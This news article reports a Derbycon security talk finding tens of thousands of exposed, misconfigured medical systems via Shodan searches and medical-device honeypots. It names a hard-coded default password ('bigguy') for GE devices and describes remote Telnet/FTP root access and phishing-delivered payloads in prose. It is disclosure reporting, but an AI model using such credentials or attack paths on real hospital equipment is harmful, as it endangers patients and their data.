Recent reports presented by Scott Erven and Mark Collao at Derbycon have revealed that thousands of medical systems are exposed to widespread cyber-attacks. The researchers reported that a giant U.S. medical organization with 12,000 staff and 3,000 physicians has over 68,000 systems that are vulnerable. The researchers indicate that this is just the tip of the ice berg, as thousands of similar organizations are exposed too.
According to The Register, the vulnerabilities are not limited to one kind of system but cut across a large number of categories. It is reported that these include 21 anesthesia, 488 cardiology, 67 nuclear medical and 133 infusion systems in addition to 97 MRI scanners and 323 picture archiving and communications devices.
To detect the vulnerabilities, they made internet searches using the Shodan search engine. They were able to identify some gaps that allowed for administrative access over the open, public internet- resulting in more than 55,000 SSH and web logins and 299 malware payloads. They attracted mostly clueless attackers using “real life” MRI and defibrillator machine honeypots that mimicked actual medical devices.
With 5 years’ experience in securing medical devices, Erven, also an associate Director at Protiviti, paints a very gloom picture. He indicates that hackers have access to critical hospital machinery. Furthermore, alteration of the search in order to target specialty clinics such as pediatrics and podiatry revealed more cause for concern. They machines had numerous misconfigurations apart from countless direct attack channels. This exposed the clinics to data theft as well as breach of patients’ privacy.
On his part, Callao, a security consultant from NeoHapsis stated that: “You can easily craft an email and send it to the guy who has access to that [medical] device with a payload that will run on the (medical) machine,” This is made possible by the fact that attackers can build create detailed intelligence on medical centers, including the location of specific devices. He further highlighted that most of these critical systems were running on Windows XP or XP service pack two and likely do not have any antivirus. This enabled them to dangers such as execution of custom payloads, establishing shells, and lateral pivoting within a network.
GE is one of the affected medical equipment manufacturers and the report revealed that their devices granted login access a whopping 85% of the time. Some allowed for remote root access over Telnet and FTP to nuclear imaging and cardiology systems. In fact, some of these were either hard coded or had default passwords such as “bigguy”. Apart from this, there were also revelations of the failure by manufacturers to scrub out bugs thus resulting in patched flaws in over a hundred medical devices. However, Erven gave credit to GE for being the most proactive in not only fixing bugs but also interacting with security experts.
It was revealed that one of the reasons why more devices are increasingly getting exposed to danger is that most hospitals are now Wi-Fi connected and do not support arcane protocols. For half a year, they based their honeypots on numerous devices as well as a fake Twitter hacker account to attract interested would-be-attackers. The attackers did not really know what type of devices they had gained access to. However, they did enumerations, dropped payloads and even connected to command centers.
In conclusion, it is safe to say that this report reveals a serious flaw in the often critical medical systems. These flaws need to be addressed quickly and conclusively so as to eliminate the danger that they pose not only to patients but also the medical organizations.
pic ref fox